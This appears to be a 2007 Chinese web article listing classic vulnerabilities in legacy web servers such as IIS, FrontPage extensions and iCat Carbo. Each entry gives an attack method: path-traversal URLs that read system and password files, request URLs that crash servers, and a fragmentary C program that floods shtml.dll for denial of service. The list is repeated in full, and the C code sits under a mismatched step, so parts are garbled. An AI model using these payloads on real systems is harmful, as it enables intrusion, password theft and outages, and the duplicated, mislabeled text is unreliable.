一些收集到的经典漏洞详解第1/2页
更新时间:2007年01月16日 00:00:00 作者:
☆carbo.dll☆
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,
这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:
提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'
查看win.ini文件: c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
___________________________________________________________________________
☆uploader.exe☆
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe
会带你到上传页面,剩下的事就不用我告诉你了把?:)
___________________________________________________________________________
☆search97.vts☆
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
___________________________________________________________________________
☆newdsn.exe☆
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,
利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=
2. D.o.s攻击:提交下列连接请求:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:
- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。
- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,
如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS会产生保护性错误。
___________________________________________________________________________
☆service.pwd☆
http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.
攻击方法:
访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。
___________________________________________________________________________
☆users.pwd☆
UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/users.pwd。
___________________________________________________________________________
☆authors.pwd☆
UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/authors.pwd。
___________________________________________________________________________
☆administrators.pwd☆
UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/administrators.pwd。
___________________________________________________________________________
☆shtml.dll☆
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息.
但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. http://TrustedServer如果用户点击
上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客
户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,
shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,
能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
攻击方法:
1. 暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html
这样将返回以下信息:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
2. 可信任站点执行脚本:使用如下格式的URL:
serv_addr.sin_family =AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");
serv_addr.sin_port = htons(80);
if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Create Socket faild \n");
return ;
}
if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
{
printf("Connect faild \n");;
}
else
{
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );
for (lDo = 0 ;lDo < 7000;lDo ++)
{
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;
if (lLen < 0 )
{
printf("Send faild \n");
return;
}
}
lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;
//recv(sockfd,buffer,2000,0);
//printf(buffer);
//printf("\n");
}
closesocket(sockfd);
}
___________________________________________________________________________
☆shtml.exe☆
微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。
通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。
攻击方法:
提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/
prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe
/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_
vti_bin/shtml.exe/com1 .
___________________________________________________________________________
☆queryhit.htm☆
如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。
攻击方法:
访问http://www.victim.com/samples/search/queryhit.htm 如果是搜索页面,然后在查找文件对话框里输入以下字符串:
[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。
___________________________________________________________________________
☆Dotdotdot☆
vqServer及Sybase PowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW
中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击
者绕过WEB安全系统横贯到其他目录。
攻击方法:
假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys
列出根目录。 http://example.com/ /../../../../../../
___________________________________________________________________________
☆autoexec.bat☆
现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来
退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.
攻击方法: :8080/../../../autoexec.bat 这样将读取畹统中的autoexec.bat文件
这个漏洞的利用还取决于系统目录的结构而定.
___________________________________________________________________________
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆
IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,
还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,
这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。
这个目录物理映射在下面的目录下:
c:\winnt\system32\inetsrv\iisadmpwd
攻击方法:
访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,
这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:
提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'
查看win.ini文件: c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
___________________________________________________________________________
☆uploader.exe☆
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe
会带你到上传页面,剩下的事就不用我告诉你了把?:)
___________________________________________________________________________
☆search97.vts☆
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
___________________________________________________________________________
☆newdsn.exe☆
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,
利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=
2. D.o.s攻击:提交下列连接请求:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:
- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。
- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,
如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS会产生保护性错误。
___________________________________________________________________________
☆service.pwd☆
http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.
攻击方法:
访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。
___________________________________________________________________________
☆users.pwd☆
UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/users.pwd。
___________________________________________________________________________
☆authors.pwd☆
UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/authors.pwd。
___________________________________________________________________________
☆administrators.pwd☆
UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/administrators.pwd。
___________________________________________________________________________
☆shtml.dll☆
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息.
但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. http://TrustedServer如果用户点击
上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客
户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,
shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,
能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
攻击方法:
1. 暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html
这样将返回以下信息:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
2. 可信任站点执行脚本:使用如下格式的URL:
serv_addr.sin_family =AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");
serv_addr.sin_port = htons(80);
if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Create Socket faild \n");
return ;
}
if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
{
printf("Connect faild \n");;
}
else
{
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );
for (lDo = 0 ;lDo < 7000;lDo ++)
{
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;
if (lLen < 0 )
{
printf("Send faild \n");
return;
}
}
lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;
//recv(sockfd,buffer,2000,0);
//printf(buffer);
//printf("\n");
}
closesocket(sockfd);
}
___________________________________________________________________________
☆shtml.exe☆
微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。
通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。
攻击方法:
提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/
prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe
/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_
vti_bin/shtml.exe/com1 .
___________________________________________________________________________
☆queryhit.htm☆
如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。
攻击方法:
访问http://www.victim.com/samples/search/queryhit.htm 如果是搜索页面,然后在查找文件对话框里输入以下字符串:
[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。
___________________________________________________________________________
☆Dotdotdot☆
vqServer及Sybase PowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW
中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击
者绕过WEB安全系统横贯到其他目录。
攻击方法:
假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys
列出根目录。 http://example.com/ /../../../../../../
___________________________________________________________________________
☆autoexec.bat☆
现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来
退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.
攻击方法: :8080/../../../autoexec.bat 这样将读取畹统中的autoexec.bat文件
这个漏洞的利用还取决于系统目录的结构而定.
___________________________________________________________________________
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆
IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,
还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,
这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。
这个目录物理映射在下面的目录下:
c:\winnt\system32\inetsrv\iisadmpwd
攻击方法:
访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。
相关文章
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷...2007-02-02
最新评论